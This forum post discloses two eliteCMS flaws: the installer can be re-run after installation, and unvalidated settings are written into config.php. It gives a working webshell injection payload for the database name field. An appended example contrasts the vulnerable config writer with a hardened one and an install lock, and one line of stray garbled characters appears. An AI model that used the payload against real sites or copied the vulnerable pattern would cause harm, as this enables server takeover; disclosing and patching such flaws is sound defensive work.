
eliteCMS: installer not locked after installation + one-line webshell write vulnerability

Original poster, posted 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation completes, so an attacker can visit the installer URL and run the installation again.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the values come straight from $_SESSION (filled from $_POST) and are
    // interpolated into PHP source with no validation or escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php.
8 D' b4 [; f' B) ~
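As an added example, and not code from the post or from eliteCMS itself: the installer's config writer rebuilt in PHP in the vulnerable shape the post describes, beside a hardened version, plus the install lock the post says is missing. The function names, the lock file name, the validation patterns and the sample POST values are my own assumptions; the sample database name is a constructed break-out value in the spirit of the post's payload, not the post's exact string.

```php
<?php
// Added example (not eliteCMS code). Function and file names are illustrative.

// 1. The pattern from the post: untrusted values are interpolated straight
//    into PHP source. A double quote in any value closes the string literal
//    and whatever follows is compiled as code when config.php is included.
function build_config_vulnerable(array $db): string
{
    $write  = "<?php\n";
    $write .= "define(\"DB_SERVER\", \"{$db['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$db['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$db['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$db['DB_PASS']}\");\n";
    return $write;
}

// 2. Hardened writer: whitelist the fields that have a known shape and emit
//    every value through var_export(), which yields a correctly quoted and
//    escaped PHP literal, so no raw user text ever becomes source code.
function build_config_safe(array $db): string
{
    // assumed patterns: hostname[:port] or IP; MySQL identifiers are [0-9A-Za-z$_]
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]+(:\d{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_$]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_$.\-]{1,32}$/',
    ];
    foreach ($rules as $key => $re) {
        if (!isset($db[$key]) || !preg_match($re, $db[$key])) {
            throw new InvalidArgumentException("invalid value for $key");
        }
    }
    // the password may legitimately contain anything, so it is only escaped
    $write = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $write .= 'define(' . var_export($key, true) . ', '
                . var_export((string) $db[$key], true) . ");\n";
    }
    return $write;
}

// 3. Lock the installer: refuse to run once a marker file exists and create
//    that marker as the last step of a successful installation.
function installer_locked(string $lock = __DIR__ . '/install.lock'): bool
{
    return file_exists($lock);
}

function finish_install(string $configPath, string $configSource,
                        string $lock = __DIR__ . '/install.lock'): void
{
    file_put_contents($configPath, $configSource, LOCK_EX);
    file_put_contents($lock, date('c') . "\n", LOCK_EX);
}

// Constructed input: a "database name" that closes the string literal and
// appends its own statement; the password carries a stray quote as well.
$posted = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => 'x"); eval($_POST["c"]); //',
    'DB_USER'   => 'root',
    'DB_PASS'   => 'p@ss"word',
];

if (installer_locked()) {
    exit("installer is locked; delete install.lock to reinstall\n");
}

// vulnerable output contains:  define("DB_NAME", "x"); eval($_POST["c"]); //");
echo build_config_vulnerable($posted);

try {
    echo build_config_safe($posted);           // DB_NAME fails the whitelist
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

$posted['DB_NAME'] = 'elitecms';
// safe output contains:  define('DB_PASS', 'p@ss"word');  (quote is inert)
echo build_config_safe($posted);
```

The two controls are independent: the whitelist plus var_export() closes the code-injection path even for a legitimate first install, and the lock file stops the re-run that the post describes; the lock check belongs at the very top of the installer, before any step is dispatched on `$_GET['step']`.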